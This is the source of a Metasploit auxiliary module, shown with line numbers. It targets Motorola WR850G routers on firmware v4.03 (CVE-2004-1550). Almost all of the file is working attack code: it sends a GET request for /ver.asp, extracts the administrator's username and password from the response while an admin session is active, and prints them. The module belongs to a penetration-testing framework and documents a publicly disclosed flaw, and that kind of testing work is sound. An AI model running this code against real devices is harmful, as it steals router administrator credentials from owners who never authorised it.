Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8

9
  def initialize(info = {})
10
    super(update_info(info,
11
      'Name'           => 'Motorola WR850G v4.03 Credentials',
12
      'Description'    => %q{
13
          Login credentials to the Motorola WR850G router with
14
        firmware v4.03 can be obtained via a simple GET request
15
        if issued while the administrator is logged in.  A lot
16
        more information is available through this request, but
17
        you can get it all and more after logging in.
18
      },
19
      'Author'         => 'kris katterjohn',
20
      'License'        => MSF_LICENSE,
21
      'References'     => [
22
          [ 'CVE', '2004-1550' ],
23
          [ 'OSVDB', '10232' ],
24
          [ 'URL', 'https://seclists.org/bugtraq/2004/Sep/0339.html'],
25
      ],
26
      'DisclosureDate' => '2004-09-24'))
27

28
    register_options([
29
      Opt::RPORT(80)
30
    ])
31
  end
32

33
  def run
34
    connect
35

36
    sock.put("GET /ver.asp HTTP/1.0\r\n\r\n")
37
    response = sock.get_once
38

39
    disconnect
40

41
    if response.nil? or response.empty?
42
      print_status("No response from server")
43
      return
44
    end
45

46
    # 302 Redirect
47
    if response.split(/\r\n/)[0] !~ /200 Ok/
48
      print_status("Administrator not logged in")
49
      return
50
    end
51

52
    user = $1 if response.match("http_username=([^\n]*)<br>")
53
    pass = $1 if response.match("http_passwd=([^\n]*)<br>")
54

55
    print_status("Found username \"#{user}\" and password \"#{pass}\"") if user and pass
56
  end
57
end
58

59